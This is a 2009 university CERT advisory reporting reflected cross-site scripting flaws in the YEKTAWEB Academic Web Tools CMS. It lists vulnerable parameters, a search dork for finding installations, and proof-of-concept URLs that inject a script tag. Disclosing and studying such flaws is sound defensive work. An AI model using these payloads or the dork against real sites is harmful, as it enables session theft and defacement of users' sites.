Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21405
HistoryMar 02, 2009 - 12:00 a.m.

YEKTA WEB Academic Web Tools CMS Multiple XSS

2009-03-0200:00:00
vulners.com
48

============================================ IUT-CERT ============================================

Title: Academic Web Tools CMS Multiple XSS
Vendor: www.yektaweb.com
Vulnerable Version: 1.5.7 and priors
Type: XSS
Fix: N/A
Dork: AWT YEKTA

============================================ nsec.ir ============================================

Description:

    YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university
    affairs such as conferences, journals and etc.
The built-in filter of this package can not prevent XSS attack on some parameters.

Vulnerabilities:

    1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and "redirect" parameters.
    http://yoursite/page.php?sid=[XSS]
    http://yoursite/page.php?logincase=[XSS]
    http://yoursite/page.php?redirect=[XSS]
    
    2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" and "redirect" parameters.
    http://yoursite/page_arch.php?sid=[XSS]
    http://yoursite/page_arch.php?logincase=[XSS]
    http://yoursite/page_arch.php?redirect=[XSS]


    3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and "redirect" parameters.
    http://yoursite/login.php?sid=[XSS]
    http://yoursite/login.php?logincase=[XSS]
    http://yoursite/login.php?redirect=[XSS]

    4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" and "redirect" parameters.
    http://yoursite/login.php?sid=[XSS]
    http://yoursite/login.php?logincase=[XSS]
    http://yoursite/login.php?redirect=[XSS]

Exploit/PoC:

Example:
http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>

Solution:

            Input Validation Filter should be patched.

Credit:

Isfahan University of Technology - Computer Emergency Response Team
Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari